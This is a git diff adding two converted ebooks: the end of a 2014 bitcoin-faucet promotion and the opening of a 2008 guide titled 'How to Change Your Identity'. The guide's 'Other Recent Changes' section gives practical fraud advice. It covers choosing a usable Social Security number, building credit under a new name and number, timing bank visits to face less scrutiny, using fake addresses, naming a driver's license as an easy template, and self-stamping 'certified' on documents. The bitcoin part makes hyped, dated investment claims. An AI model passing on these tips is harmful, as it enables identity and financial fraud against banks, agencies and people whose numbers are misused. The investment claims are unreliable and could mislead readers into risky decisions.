mathematical formulas associated - this now requires +quite significant (and growing!) computing power. +There's a limit to how many bitcoin will be created +The Bitcoin protocol - the code and mathematical rules that bitcoin is based on state that +there will only ever be 21 million bitcoins created by miners. +This finite number means that bitcoin is deflationary rather than inflationary like all other +national currencies; i.e. because the bank is constantly printing more money to cover debt +and to fill new loans, the value of the currency as a whole falls - thus we have inflation. +However with bitcoin, only 21 million can ever be created, so the currency is deflationary - +as it becomes used more and more in demand, the price will rise as there is a fixed, +definite, limited supply. +Now 21 million might not sound like enough if it is really to be adopted and used as a +worldwide currency and accepted in all online shopping. +But it is :) + +Breaking down a bitcoin (bits and satoshis) +This is where things start to get really interesting :) +Understanding the make-up of a bitcoin will help you to see just how valuable the +thousands of bits that you can get for free TODAY really could be in the future. +Each bitcoin can be divided down into 8 decimal places - so each bitcoin contains 100 +million units, each called a 'Satoshi', (named after the mysterious founder of bitcoin +Satoshi Nakamoto) - here 1 satoshi is represented: +0.00000001 +However, more recently the unit of "bits" has been adopted. +There are 1 million bits in every bitcoin - this takes the decimal placing to only 6 spaces +out of the available 8, leaving 2x 00s left over on the end, which will be used as decimals. +Here one bit is represented: +0.00000100 +The measurement in bits has been created with e-commerce in mind. We are simply used +to thinking in whole numbers, so rather than thinking of the price of something being 0.06 +of a bitcoin, we write this price as 60,000 bits. +Looking at bitcoin like this makes it much easier and more realistic to see how it will be +used and how it really can go mainstream right! ;) +And right now, you can still get THOUSANDS of bits for free every day! +If you did this 4 years ago... +So if you had spent a little time each day 3 years ago getting some free bitcoin using the +free bitcoin faucets I'm going to show you, if you acquired just $1 a day for a year - then +that $365 value would now be worth $182,500* +*math assumes from perspective of bitcoin being worth $1 3 years ago to being worth $600 today. +... yes... WOW! +Even if you are only getting small amount of $ value worth of bitcoin today, and it might +seem like you have missed the boat from when the price was $1 or less, to it now being +worth $600 - but this is far from the truth. +Please keep in mind that there is HUGE investment going into bitcoin right now (so far in +2014 there has been over $250million invested by venture capitalists into bitcoin start-ups +- this is approximately the same amount as went into Internet business start-ups in the whole of +1994, the start of the Internet boom).Right now you can invest in bitcoin (or get free bitcoin) +BEFORE it really goes mainstream + +- before Wall St gets the regulation it needs to be able to trade it and offer it in ETFs and +funds for investors (rumoured to be coming at the end of 2014 / early 2015), before it gets +implemented into mainstream banking, and before it gets really mass adopted as a +payment currency online and offline (this is already well under-way and new merchants +are accepting bitcoin every day - including Expedia, New Egg, Overstock and Tiger +Direct). +The THOUSANDS of "bits" you are getting for free right now will have real value in the +future - the thought of needing to acquire a whole bitcoin will be laughable, it is the +decimals, the bits which will be used. +It is right now which is the critical time to invest in, or get involved in bitcoin - or get a LOT of bits for free, +while you still can! +Especially because you can do so for 30 minutes in your lunch hour instead of playing flash games, or +even on your smart-phone as you sit on the toilet! +Imagine 10 years from now when bitcoin really is adopted and used in the +mainstream, being able to say to people you made 100,000 bits while sitting on the +toilet back in 2014 :) + +Chapter 2: Claim 2.7 MILLION Satoshi in 10 +Minutes +This is where we get started get some free bitcoin. +Follow the 3 steps below and signup for the 3 free bitcoin wallet services (they also +happen to be the largest companies, and the SAFEST to store your bitcoin. - you can +earn $5 worth of bitcoin from the first 2 (90,000, and 15,000 satoshi from the 3rd - +This will take you 10 minutes - 2.7million satoshi in 10 minutes :D Nice! +1. Bitalo: For a limited time they are giving $5 in free bitcoin to all new members - +just signup to get your free bitcoin wallet with them. They are also THE safest online +wallet. They take security more seriously than any other and FORCE 2 factor +authentication (i.e. you have to enter your password AND get pin code from your +smartphone to use your wallet. +2. Coinbase (The USA's largest and most trusted exchange): They also offer $5 in +free bitcoin when you join, and have a lot of security features - they are generally +seen as the market leaders in functionality, ease of storage and buying bitcoins. +3. Xapo - They give 50 bits free when you join INSTANTLY and a further 100 bits if +you share on twitter and facebook (a total of 15000 satoshi) :)They are also the first +service to offer really solid online "VAULT". This goes deeper and offers more layers +of encryption and authentication - especially when you come to move or withdraw +your bitcoin. 1 They also offer a debit card! You can top-up your debit card using +your bitcoin, and spend it in $s in retailers around the world. +There are many sources to get your wallet from but we recommend these 3, they are the +SAFEST and most trusted, and of course, they offer free bitcoin when you join :) but in the +interest of variety here are 2 more online wallet services which are really safe and trusted: +1 Bitfinex - A personal favourite actually (because you can earn INTEREST on the +bitcoins you hold in there + save l0% off your first month's fees with this link.) +Blockchain.info - A very simple, but functional online wallet (not an exchange you +can't buy bitcoins here, only store them). + +Chapter 3: Faucets list — Claim 5.000 Satoshi +an HOUR +This is where you can really get a lot of satoshi daily - the above exchanges you can only +join once and get your $5 in bitcoin once but these websites give you free satoshi/bits +every day or every hour.. some payout every 5-15 minutes! +Here is our top 10 list of free bitcoin faucets which you can claim anywhere from 100-300, +or maybe even 1000s of bits/satoshi, all you have to do is simply enter your bitcoin wallet +address. +At present estimate, you can earn up to 5,000 satoshi an HOUR using JUST these 10 +websites: +* Or if you need it then here is a quick walk through video, of me showing you how to use 4 +of the faucets listed.. you will soon get the idea, it's pretty simple :) +Site Name Frequency Payout (satoshis) +BitCoinKer 15 Minutes 100-300 +Moon Bitcoin 5 Minutes 100-300 +Bitcoin Zebra 1 Hour 100-400 +FreeBitco.in 1 Hour 300+ +Pizza Faucet 1 Hour 100-300 +Coin Giveaway 1 Hour 100-300 +Daily Bitcoin 1 Hours 250 - 1200 +Coin Check In 5 Minutes 15-300 +We hope you have enjoyed this guide, hope you have a lot of fun along the way learning +about bitcoin - and hope you can get involved and make an investment that might just +change your life in the future when the investment and adoption into bitcoin really starts to +come into fruition in the years to come! diff --git a/How to get a new Identity Ariza Research 2008_pdf.md b/How to get a new Identity Ariza Research 2008_pdf.md new file mode 100644 index 0000000..bfa0642 --- /dev/null +++ b/How to get a new Identity Ariza Research 2008_pdf.md @@ -0,0 +1,11777 @@ +# How to get a new Identity Ariza Research 2008 + + +--- + +Please Note: This single +document contains your +“Change Your Identity” report +plus all three bonus reports +combined into a single +document. +© Copyright 2008, Ariza Research, All rights reserved - ABP +Reproduction in any form is prohibited without written permission. + +"How to Change Your Identity" +By Jim and Susan Petersen +© Copyright 2008 – Ariza Research – All Rights Reserved - ABP +Any attempt to violate this copyright will result in aggressive +prosecution under The Digital Millennium Copyright Act of 1998. +Revision: 8-08 +Disclaimer: +Do not break the law. The information in this publication is for +© Copyright 2008, Ariza Research, All rights reserved - ABP - 2 - +Reproduction in any form is prohibited without written permission. + +informational or entertainment purposes only. Laws regarding the +acquisition and use of identity documents are constantly changing. +Before attempting to use any of the techniques or tactics discussed in +this publication, always consult an attorney who is familiar with +applicable laws in your area. Due to recent legislation we are unable to +provide personal assistance of any kind. We do not deal in illegal +documents or services. +Code: 8203f +Table of Contents +2008 Real ID Update 4 +Chapter #1 Recent Developments 13 +Chapter #2 The “Internet” Method 27 +Chapter #3 The “Living Dead” Method 36 +Chapter #4 The Classic “Ariza” Method 40 +Chapter #5 The “Foreign Citizenship” Method 73 +Chapter #6 The “Camouflage Passport” Method 76 +Birth Certificate Numbering System 81 +Changing Your Social Security Number 84 +Fake ID 91 +Paper Tripping 93 +Using Mail Drops 95 +Identity Theft 102 +Medical Records 103 +Old Social Security Cards 107 +Advanced Privacy Tactics 110 +College Degrees 129 +Avoiding Process Servers 130 +Working “Off the Books” 131 +Passports 134 +Buying a Car 137 +Pre-Identity Changing Planning 138 +Witness Protection Program Details 140 +Re-entering the U.S. 149 +Baptismal Certificates 152 +Employment References 154 +Banking Security 155 +Offshore Strategies 155 +Travel Considerations 166 +Irish Citizenships/Passports 167 +Adoption Tactics 168 +Wealth Mobility 170 +French Foreign Legion 175 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 3 - +Reproduction in any form is prohibited without written permission. + +How They Find Us 179 +Update 2008 - The New “Real ID” Act +Great news! The Real ID law is on the ropes. As of later March +2008 the entire program has been officially delayed until at least +Jan1, 2010. But you can expect further delays or even repeal of +the entire law before then. This is good news for any freedom +loving American. +If you want to change your identity – now is the time to act. Over +the next decade states will be tightening their ID requirements so +to wait is foolish. The sooner the better! +Real ID Madness +In 2005 President Bush happily signed into law a sweeping new +law that promised to forever change the relationship between +citizen and government. +The law creates a series of new federal requirements for the +issuance of new or replacement drivers licenses. In effect it would +convert the old state-designed drivers license into a national ID +that meets federal standards. +The law does two things. It lays out the exact standards that state +issued drivers license must meet in order to qualify +After a five year introductory period the new federal ID would be +required to open a new bank account, board a scheduled airline +flight, apply for any kind of government benefit or even enter any +kind of federal building. Clearly life without one of these cards +would be quite difficult. +How It Works +Instead of renewing your drivers license through the mail or in the +usual facility run by those nice kind old ladies, you will be required +travel to a larger regional center where you will be required to +prove your identity to the government’s new standards. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 4 - +Reproduction in any form is prohibited without written permission. + +You will be required to produce government-issued ID documents +such as your birth certificate and/or passport. Only government +issued documents that can be electronically verified with the +issuing authority will be accepted. +Your picture will be taken and a digital picture file will become a +permanent part of your new federal dossier along with your birth +date and your signature. +In addition your biometric information will be acquired and +recorded. This will probably include an eye scan or palm scan and +a fingerprint. +Any documents you provide will be scanned and the images will +be recorded in a new database indexed by your name, birth date, +home address, social security number and possibly a fingerprint +number. +This document database will be entirely searchable by any and all +government agencies and, of course, law enforcement. Any other +information Uncle Sam may have on you (your criminal record, +your military record, any negative information they may have on +record) will be attached to your file for future reference. +Does any of this make you nervous? Can you smell the foul +stench of totalitarian repression? +The goal here is a dual one. The government will force you into +proving: +1. That you are who you say you are. +2. That you are a legal citizen who is living legally in the U.S. +Of course, if you are a wanted criminal with outstanding warrants +in NCIC you can expect to be arrested during the Real ID +application process. +The New ID Standard +Each new federally-approved license will include a number of +security devices that were carefully engineered to make +counterfeiting much more difficult. The magnetic strip will include +personal information but that data will be encrypted using a +sophisticated algorithm known only to federal officials. +The card will also include two sets of data. One will link the holder +to the card using two biometric numbers, one that encodes your +eye scan data and the second will (probably) be the data from +your fingerprint. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 5 - +Reproduction in any form is prohibited without written permission. + +This will link your physical body to the card making card switching +impossible. +Then a second set of data will be the key to your federal data file +containing your personal documents and related information. In +this way the card can be linked to you and the card can be +scanned through a reader that gives the scanner full access to +your federal file. +To President Bush all this sounds really nifty. Problem is – +resistance to this whole program is fierce. 21 cities have sworn to +resist Real ID as have a half dozen states. Numerous attempts +have been made to crush the law before it’s fully enacted. +Groups on both the left and right are combating Real ID. The +leftist ACLU is spending a small fortune on a nation-wide publicity +program against the law. And on the right Dick Armey and the +Heritage Foundation are doing the very same thing. The governor +of Montana has been particularly strident in his opposition. +Imagine how such a card could be used. The government could +use it to track our every move, our every financial transaction. And +I thought this was a free country! +The Problems +There are many problems with Real ID. First is the simple fact that +the computerized systems required to verify ID documents on a +real time basis doesn’t exist and won’t for at least another decade. +Most of the Vital Record offices where birth certificates are stored +aren’t in any way automated. In fact, most are dusty little holes in +the wall where elderly ladies look up enquires by searching +through huge drawers of rotting papers. Will these little ladies be +able to keep up with all the new verifications required to support +the Real ID systems? I doubt it. +And if we want to automate them and bring them into the 21st +century, the financial cost will be tremendous. When President +Bush signed the Real ID bill into law did he send out the billions +needed to build the system. No he didn’t This is yet another +example of a federal unfunded liability. +Some limited funding has entered the pipeline but it’s only a nickel +on the dollar and many states are fighting Real ID for this reason +alone. State budgets are already in deficit. Experts have predicted +that if fully enacted Real ID will cost a whopping 11 billion – +money the states simply don’t have. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 6 - +Reproduction in any form is prohibited without written permission. + +And exactly how will this new license be used? If a cop stopped +you will you be required to produce your Real ID license? If you +don’t have it will you be thrown in jail? This harkens back to a +black age when the words “where are your papers – you must +have your papers” were a hallmark of the Nazi age. +Will we be required to produce the license along with our credit +card in order to make credit card purchases? This will help make +credit card fraud more difficult but it will also allow the feds to +monitor our every financial transaction. How will that information +be used? How much do you trust the federal government? +The Current Situation +The Real ID program was to be introduced over a five year period +beginning May 11, 2008. But fortunately the government’s plans +have failed. +Because of a lack of funding along with a lack of the computer +systems required and because of the political pressure against it, +the whole program has been shifted to the back burner. +Some months ago the Homeland Security agency announced that +it would entertain requests for extensions from states. As of April +4, 2008 49 states have requested and obtained extensions. As of +this writing Maine is still squabbling with the government and has +not yet received an extension though I expect one will be issued. +As usual, the government has tried to use spin to turn it’s failure +into a victory. Instead of announcing the extensions as a failure, +they’ve triumphantly announced that though the Real ID system +wasn’t initiated as planned, most of the states have introduced +most of the new security features to their drivers licenses so the +whole thing is a great victory! +Resistance to the Real ID program is still fierce. Many of the new +security standards have been abandoned and compromises have +been made in an attempt to make the new standards more +palatable to the states. +Problem is – the government is very tricky. Way back in the early +1960s when people were concerned with being numbered under +the social security system. To get around this resistance the feds +issued a new rule which they promoted widely. Under the new rule +your social security number could NEVER be used for +identification purposes. Most of the early social security cards +© Copyright 2008, Ariza Research, All rights reserved - ABP - 7 - +Reproduction in any form is prohibited without written permission. + +actually had this phrase emblazoned across it in an effort to quell +the growing resistance. +Then when the government was certain that most Americans were +federally numbered – they changed the rule and now the SSN is +the standard means of identifying individuals. +Real ID Privacy Issues +Once the Real ID system has accumulated the 245 million records +of drivers license holders, how secure will the database of ID +documents be? Of course the government predicts that all will be +protected by iron-clad security measures. +But given past government security mistakes, it will only be a +matter of time before some hacker will penetrate their security +system and grab our most personal records. +Just think of it – here will be a database that contains not only +your birth certificate with your birth date and all the details +surrounding your birth, but it will also contain your social security +number, your verified and confirmed home address and a host of +other government acquired information. +This database would be a virtual treasure trove of information for +an identity thief. It contains everything they need to steal your +identity and use it to fraudulently obtain credit cards or even +purchase vehicles in your name using your credit. +Such a high-value source of information would be under near +constant hacker attack. +But there’s more. Who exactly will have access to this new +collection of dossiers? Will private businesses have access? +Perhaps the corporate sponsors who have supported the +president and his party will be given free access for marketing +purposes. Information of this sort would be potentially worth +billions. Washington insiders would find it very difficult to resist the +temptation to peddle the data to any and all comers willing to pay +the price they set. +Will every city, county, state and federal employee have full +access to your personal file? Will any copy on the beat be able to +view your entire life on his laptop? +Plans include having your Real ID file communicate with all the +other hundred or more personal files big brother is maintaining on +you. This kind of accumulated information could form the core of a +© Copyright 2008, Ariza Research, All rights reserved - ABP - 8 - +Reproduction in any form is prohibited without written permission. + +whole new way of life for Americans. Some are calling it the dawn +of the “big brother society” where 100% surveillance will be the +norm. We would all live in a glass fishbowl where we would live +out our lives under the constant gaze of government snoops. +Can we trust the government with so much personal information? I +don’t think so. Some years ago the FBI instituted a new +investigation procedure for those who purchased guns. +When you initiated your gun purchase the FBI would open an +investigation to be sure you were legally able to complete the +purchase. Under the law that information was to be maintained in +an FBI database for no more than 30 days. After that, the law +required that the information, in the interest of protecting personal +privacy, would have to be destroyed. +Did the FBI comply with this particular requirement? Of course +they didn’t. Instead, the FBI committed a federal felony and +decided that this data should be maintained in fully searchable +databases for the use of law enforcement. (Those who worry +about their second amendment rights believe that their intention is +to build a database of gun owners in preparation for the eventual +confiscation of private firearms.) +The Real ID system would deeply compromise our privacy while +providing little if any real protection. Given their sad history, you +can rely on government to abuse all this information in ways that +will expand the government’s control of it’s citizenry. +Would your Real ID license be eventually required to vote? Would +it be requir3ed to claim medical services under Medicare or +Medicaid? Would your card be scanned just for entering a national +park or a library? +The Financial Cost +Experts predict that the total cost of creating the entire Real ID +system could surpass $23 billion. The feds have so far coughed +up only a scant $50 million. When the congress voted on providing +an additional $300 million, the bill went down in flames so it looks +like sufficient funding will not materialize any time soon. +The administrative burden would be enormous. As of now the +Real ID system is scheduled to be initiated on Jan 1, 2010. at first +only those aged 40 or so or under would receive priority. Their +participation would be completed on or before 2013 while the +older participants would follow with 2018 as their final deadline. +But don’t hold your breath. The electronic infrastructure required +to meet the federal guidelines will probably take many more years +given the paltry level of federal funding. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 9 - +Reproduction in any form is prohibited without written permission. + +Biometric Follies +Those who are in the know will tell you that biometrics is not the +exact science many people think it to be. Biometric indicators can +become confused and provide false information that will, +unfortunately, be regarded as gospel despite it’s technological +shortcomings. +Real ID on the Rocks +Homeland Security while maintaining that the program is going +forward, have lately been backing off earlier more strict +requirements. For instance, their initial requirement called for +these new licenses to be made of polycarbonates and be +engraved with laser printing in an attempt to make it difficult to +create fake documents. +Recently the government backed off this requirement and has +happily embraced steps taken by various states to help make their +licenses more tamper resistant despite the fact they don’t meet +the earlier federal standards. +A total of 38 states have passed legislation opposing the Real ID +law. Over 600 other organizations have gone on record opposing +this burdensome new law including the National Association of +Governors. +For more on the Real ID system you can visit the ACLU’s anti- +Real ID site at: www.realnightmare.org. +License bureaus have no way to quickly and accurately determine +the validity of foreign passports and immigration documents. They +can’t even accurately verify our own immigration cards and +papers. Many states can’t even verify driver licenses issued by +other states. +And if you apply for your new Real ID license in a state other than +the one in which you were born, you will run into a problem. How +can you get around these and other ID problems? Simple – get a +passport. The U.S. passport is the most influential ID document +you can carry with one exception. While your passport can prove +your citizenship, your age, the existence of your birth certificate +and your name it cannot help you confirm your home address. +Under the Real ID legislation is a note that states that the U.S. +passport meets all the standards of the Real ID requirements +except the address requirement. +All of this paper shuffling will cost you. Forget the old $20 fees and +start thinking about much higher fees that might even surpass the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 10 - +Reproduction in any form is prohibited without written permission. + +$100 level especially at first while there is no computerized +infrastructure to provide quick low-cost verifications. +Illegal Aliens +Foreigners who are legally authorized to reside in the U.S. will be +issued licenses but their the expiration date of the license will +match the expiration of their visa. In this way the government can +pressure illegal aliens to leave the country. +What about the 10% of Americans who never had a birth +certificate filed after their birth? What will become of them? Or +how about criminals or illegal aliens who overstay their visas? This +law will create a permanent new underclass of second class +citizens. +Under this new system you can forget the old adage about being +innocent until proven guilty. Under this system you will be a +permanent suspect who will constantly have to prove you’re +innocent – at least during the situation at hand. +If you have a current passport in your possession you will be able +to board planes, enter federal buildings, apply for government +benefits and vote. It’s your way around the Real ID system. +But then perhaps you should also write your congressperson and +senator and demand that they kill the clearly unconstitutional Real +ID law. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 11 - +Reproduction in any form is prohibited without written permission. + +Drivers License Applications +This chart is based on information compiled in January of 2007. +State Check Legal Online SSN Verify +Resident +Montana No No +Alaska No No +Arkansas No No +Connecticut No No +Kansas No No +Delaware No No +Louisiana No No +Maryland No No +Michigan No No +Oregon No No +Wisconsin No No +Hawaii No Yes +Maine No Yes +Nebraska No Yes +New Mexico No Yes +North Carolina No Yes +Utah No Yes +Vermont Yes No +Washington No Yes +Massachusetts No Yes +Minnesota No Yes +New Jersey No Yes +North Dakota No Yes +Oklahoma Yes No +Texas No Yes +Illinois No Yes +Most Difficult States to Obtain a Drivers License +Alabama Yes Yes +Arizona Yes Yes +Colorado Yes Yes +District of Columbia Yes Yes +Florida Yes Yes +Georgia Yes Yes +Idaho Yes Yes +Kentucky Yes Yes +Missouri Yes Yes +© Copyright 2008, Ariza Research, All rights reserved - ABP - 12 - +Reproduction in any form is prohibited without written permission. + +Nevada Yes Yes +New Hampshire Yes Yes +New York Yes Yes +Ohio Yes Yes +Pennsylvania Yes Yes +South Dakota Yes Yes +Virginia Yes Yes +Wyoming Yes Yes +Chapter 1 +2007 Update - Recent ID Developments +The federal government is busy trying to standardize the blizzard +of different birth certificate and drivers license formats. Buried +deep in the 2005 intelligence bill are some provisions anyone +concerned with privacy and individual liberty should be aware of. +First the feds are working to develop a standard for a fraud- +resistant birth certificate. The details are yet to be determined but +you can expect some sort of machine readable bar code. +Other federal committees are developing machine readable +encoded data standards for all drivers licenses. After some period +(currently proposed – the end of 2006) the federal government will +no longer accept drivers licenses that don’t meet the new +standard. In the past this requirement didn’t mean much except to +those who would be applying for some sort of federal assistance +like welfare or ADC. +But since you now need an acceptable ID to get on a plane, this +new legislation becomes much more important. While states will +continue to issue drivers licenses, if a state fails to add the +computer readable data to their licenses, their holders won’t be +able to fly or apply for any kind of federal benefits. This places +extreme pressure on the states to comply and comply quickly. +This is one time you don’t want to be left behind. +While the pressure is great, the details on the encoding standard +are still being worked out. They’ll probably want to avoid magnetic +strips as they can be easily changed and also easily erased +(either by mistake or on purpose). +No doubt the information will be encrypted using some very strong +algorithm which will make forging the data very difficult. We’ll have +to wait and see what they come up with. +The new rules forces the states to stop putting social security +numbers on their drivers licenses. This comes as no surprise +given the explosive increase in identity theft (you should never +carry anything in your wallet or purse that lists your social security +© Copyright 2008, Ariza Research, All rights reserved - ABP - 13 - +Reproduction in any form is prohibited without written permission. + +number). But the problem now is – what number are they going to +use in the new federal databases? +If we ever get a universal health care program in this country +(Don’t hold your breath!), we will all be issued a health ID card +with a health ID number that will be used to track our medical care +but will at the same time become a new national ID number the +feds will use to track our every move. +Exactly what data will be included on our new drivers licenses? +How and when will it be updated? How will that data be used? +How will it be used in government databases (the big question)? +The departments of transportation and homeland security will be +calling the shots on these key issues. +The department of health and human services will draft the rules +on the new standardized fraud-resistant birth certificate. +According to recent surveys the public is happy with making ID +documents more fraud-resistant. But when it comes to making +those same licenses machine readable under standards created +by government, public support turns to scorn. +Privacy advocates are howling as they predict these changes will +vaporize what little is left of our personal privacy. They also see +them as part of an ever tightening web of totalitarian control all +done in the name of “preventing terrorism”. +All but one of the 19 terrorists that were involved in the 9/11 attack +had legal drivers licenses. These new birth certificate and driver +license rules wouldn’t have prevented any of them from getting the +drivers licenses they used to board their planes. So why are we +going through all this? Good question. +Fact is, none of these rules will prevent someone from creating an +entirely new identity. It just makes the ID documents themselves +more difficult to forge. +Some privacy and freedom advocates have remarked that these +new rules move us from a state-based ID system into the realm of +a federally-controlled system with a new national ID. +As usual a wide range of organizations are opposing these new +changes. Once again we have some rather strange combinations +of groups at play here. It should come as no great surprise that +the ACLU is involved but did you ever see them partnered with the +“American Conservative Union” and the “Gun Owners of +America”? +© Copyright 2008, Ariza Research, All rights reserved - ABP - 14 - +Reproduction in any form is prohibited without written permission. + +Other Recent Changes +- Banks now have access to a list published by the Social +Security Administration that includes the social security +numbers that have been “retired”. This makes it very +difficult to use such a number to open an interest-bearing +bank account. In order to come up with a temporary usable +social security number you’ll have to be sure it’s not retired +(Check the social security death index – if it’s not listed – +it’s probably safe) AND you’ll have to be sure the middle +two digits are right for the time of issue. The first three +digits must also be the correct ones for the area you claim +to have lived in when you started working. +- The credit bureaus also subscribe to the lists of retired +SSA numbers so if you apply for credit using one of these +numbers, you can expect problems. +- States, counties, cities and the feds are creating +reciprocal data sharing agreements very quickly these +days. Those who are behind in their child support +payments or have outstanding DUIs may find that the law +has lengthened it’s arms. Just because you’re in another +distant state doesn’t mean they can’t find you. +- When a government database contains negative +information on you (whether or not it’s true), the burden of +proof which used to be on the government – they had to +prove you were guilty. Now the tables have been turned. If +the database says you are guilty – you stay guilty until you +can prove that you are innocent. This is the single most +troubling aspect of centralized government databases. +One small mistake can ruin your entire life. And just you try +to correct that data. It will take an act of congress to set +things right! +- If you live in an urban location, it may prove easier to +obtain a new drivers license if you go through the cost and +trouble of taking a driver’s school. They will run you +through some of the paperwork and you will look much +more reasonable, even if you are over age 35 if you live in +a big city where many people use mass transit. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 15 - +Reproduction in any form is prohibited without written permission. + +- If you have a very good friend who trusts you entirely, you +can quickly rebuild your credit in your new name by having +them obtain an American Express credit card and then +apply for an additional card under their account but in your +new name and social security number. You get a +prestigious credit card (a very solid piece of ID) without a +lot of questions. Then as you use it you build up a new +credit record under your new social security number. +You might be able to pull this trick with other bank cards +but policies vary from bank to bank so check things out +before you jump. Also check to be sure they report added +cards to the credit bureaus just like AMEX. +- As the feds move us toward a national ID system, they’ve +thrown a bone to the privacy and freedom advocates by +specifically prohibiting the creation of national standards +for both birth certificates and drivers’ licenses. +- If you attempt to obtain an official copy of a real birth +certificate you may find it more difficult to obtain certified +copies. Some areas are now freely issuing non-certified +copies but restricting the more official certified copies to +those who can prove a legal need. (One lady got an +unofficial uncertified copy and just stamped “certified” on it +in purple ink!) +- The Social Security Administrations “High Group List” is +listed (at this writing) on the SSA’s web site. Use the +search function to find it as the exact page it’s on may +move from time to time. +- The Social Security Admin apparently now verifies only +those birth certificates of those who apply for new numbers +under the age of 17. +- A school ID can come in quite useful these days. Just be +sure you include the following information: the name of the +school, your full name, your age (or birth date), your +student ID number, your year of graduation and your +photo. Of course you can add some other info like +homeroom number or school address. +- I’ve heard that the social security offices in the state +capitals are somewhat easier to deal with than the local +offices. Early summer is the best time as that’s when +teenagers start their new jobs. +- Never mail out more than two or three social security +number applications to the social security office from one +address. They track addresses and will tag yours as +suspicious if they get too much mail from it. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 16 - +Reproduction in any form is prohibited without written permission. + +- Recently some colleges have begun to destroy their +archived educational records that are over 15 or 20 years +old. Cuts in federal funding have made this necessary. +- Over 40,000 people have used the social security number +on the fake social security cards that used to come in +wallets sold during the 60s through the 80s. +Whatever you do don’t use this number – 078-05-1120 +unless you want some immediate attention. +- You can use a non-existent mailing address such as an +undeveloped lot or some old abandoned building. Just file +a forward order and have your mail forwarded to your mail +drop. In this way you have an untraceable home address +that can’t be easily traced. You’ll have to renew your +forwarding order each year to keep it in effect for over one +year. +- Changed your identity but lost your educational +credentials in the process? This is a common problem but +there is some good news on this front. It’s easier today to +get a new degree than ever before. You can take college +courses online at your own pace. You can take challenge +exams for credit rather than attend time-consuming +classroom classes. You can now get a great deal of credit +for your life experiences. You can also approach a college +professor and ask to take the final exam for credit. Many +instructors will allow such a deal if you can convince them +that you have the background to justify the special +treatment. Sadly you’ll still get stuck paying for the course +but you’ll get your degree much more quickly. Many +colleges have “advanced placement” policies that allow +you to take a series of exams that will accelerate your +educational progress. Independent study is yet another +way you might get course requirements out of the way +more quickly. +- The New Jersey drivers license used to be the most +widely used template but now Maine is offering serious +competition. The Maine DL is a rather simple affair with +few tamper-resistant features. +- Business banking accounts that are non-interest bearing +opened up in rural branch banks are the easiest to open +and operate. The smaller the bank the better. If you can +come up with some convincing papers that indicate that +you’ve recently put together a new business venture – +you’re in business. If you have a large check with you to +deposit in your new account – that will help grease the +wheels and impress your banker. If you show up around +© Copyright 2008, Ariza Research, All rights reserved - ABP - 17 - +Reproduction in any form is prohibited without written permission. + +9:50 am or around 11:50 (just before morning coffee break +or just before lunch) you may find your banker has other +things on their minds and won’t be quite so careful with +your paperwork. If you’re picked a bank you’d like to do +business with, if you have the time wait until they advertise +for new accounts. Chances are they will be processing a +ton of new accounts and yours will get lost in the rush. +- It’s much easier to open accounts and deal with online +banks. Many of these banks have become more respected +than in the past. Everything can be done online. The +requirements are the same but you won’t have to put up +with a questioning banker. +- Paypal is not a bank but instead is an online third party +credit card processor for those who have web sites that +sell stuff. But anyone can easily open an account, put in +money, get a very low fee debit card (Visa) and use it just +like a credit card. If you don’t choose the money market +interest option, they won’t even ask your social security +number. One other great benefit here is that most of the +objects for sale on eBay can be paid for through Paypal. +It’s a very attractive alternative to a more restrictive formal +bank account. +- If you vanish for seven years unless someone goes to +court and files, no one will declare you legally dead. But, if +you owe the state money and have left behind any debts, +the state may declare you dead in an effort to grab your +stuff. +- The drivers license once the exclusive domain of the +states, is now being federalized. This is the first step on the +road to a national driver’s license. +- By linking together the state databases, they’re creating a +national birth and death certificate database. This will +greatly accelerate cross-referencing of death and birth +records. (Finally, the old Paper Trip approach to identity +changing is going to die!) +- One provision under serious consideration in Washington +would have the Homeland Security Admin issue unique +new permanent identifying numbers. When a birth +certificate is “registered” with Homeland Security, the +number would be assigned and would remain with the +individual until well after death. +- Biometrics will be part of this new federally-linked driver’s +license. It’s not yet clear whether they will go with a +thumbprint, an iris scan, a palm scan or face recognition. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 18 - +Reproduction in any form is prohibited without written permission. + +The choice will be made soon. IBM has been working +feverishly on the thumbprint approach. The new driver’s +licenses will contain a programmable chip that will store +the fingerprint and a whole lot more. +- The master plan will allow private bankers and other +private businesses to program your license so you can use +it as a debit or credit card, an ATM card, medical ID card +and air travel security pass. +- The new driver’s license could be suspended or +cancelled by simply making an entry in a federal database. +Anyone with a unauthorized card would find it very hard to +survive – even with the assistance of friends. +- The new driver’s license will be sold in two ways. First the +public will be told that this new card will eliminate illegal +aliens, unlawful travel, deadbeat dads who don’t pay child +support, identity theft and underage drinking. Then they +will add many convenience features that will lure people in. +Of course, obtaining and using the new license will be +strictly voluntary. Later when millions have accepted their +new license, their use will become mandatory. +- Birth certificates are becoming harder to obtain in +Connecticut, New Mexico, Iowa, Hawaii and Puerto Rico. +- If you fear these new developments, now may be the time +to renew your existing driver’s license and maybe also your +passport. In this way you can avoid the new application +standards for a few more years. Renew your DL for as long +as possible under your state’s rules. +- If you have an arrest or conviction in your distant past – it +may come back to haunt you soon. Part of this new drivers +license system will fund the linking of a wide range of +databases that contain sensitive personal information. This +includes police, prison and court records that could cause +you problems in the future. One part of Big Brother’s plans +includes placing anyone who has been involved in a +violent act (that includes domestic violence) on the “No Fly” +list. These individuals would be barred from ever boarding +an airplane anywhere in the world forever! Some are +attempting to have their old criminal records cleaned up. +Imagine some cop pulling you over for running a stop sign +and having your entire life’s history right there in front of +them on their handheld computer! That’s where we are +headed! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 19 - +Reproduction in any form is prohibited without written permission. + +- In Australia the government attempted to push through a +comprehensive national ID system. It took a tremendous +amount of effort but after two years of demonstrations and +strikes, the government suddenly discovered that the +proposed system contained a fatal error and quickly +abandoned the whole thing. +The Bottom Line +The Washington insiders who run the federal government would +have us all carrying national ID cards that would have to be +produced upon demand. Armed checkpoints would be placed all +over town. We’d end up standing in long lines going through +detailed checks every time we attempted to go to a mall, a movie, +a bookstore or even the corner barber shop. +Of course, the political insiders who design this terrible system +would very carefully exempt themselves in subtle ways. +Fortunately that level of personal monitoring is unacceptable to +most Americans which keeps their nefarious plans in check. +But should the 